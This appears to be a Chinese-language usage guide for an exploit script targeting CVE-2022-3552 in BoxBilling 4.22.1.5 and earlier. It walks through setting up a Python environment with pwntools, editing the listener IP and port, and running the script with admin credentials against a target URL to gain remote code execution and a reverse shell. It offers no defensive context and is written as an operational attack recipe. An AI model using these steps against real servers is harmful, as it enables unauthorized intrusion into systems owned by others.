为了利用BoxBlilling中的漏洞,版本必须为:"BoxBilling<=4.22.1.5",并且你必须拥有有效的管理员凭据。
如果你满足上述条件,以下是获取美味的RCE(远程代码执行)所需的步骤:
创建一个 Python 虚拟环境(Linux)
python3 -m venv .venv
source .venv/bin/activate
现在安装这个 pwntools 库
pip3 install pwntools
如果报错缺少依赖,你可能还需要安装一些系统包:
sudo apt update
sudo apt install python3-pwntools
在代码中有几行需要调整,这些行决定了你计划接取 shell 的 lhost IP 和端口。
如果你正确完成了上述所有步骤,现在你应该能够运行漏洞利用并获取 shell! (-d = 目标,-u = 有效的管理员邮箱,-p = 有效管理员的密码)
python3 CVE-2022-3552.py -d http://victimtarget.com -u [email protected] -p enterpassword1HERE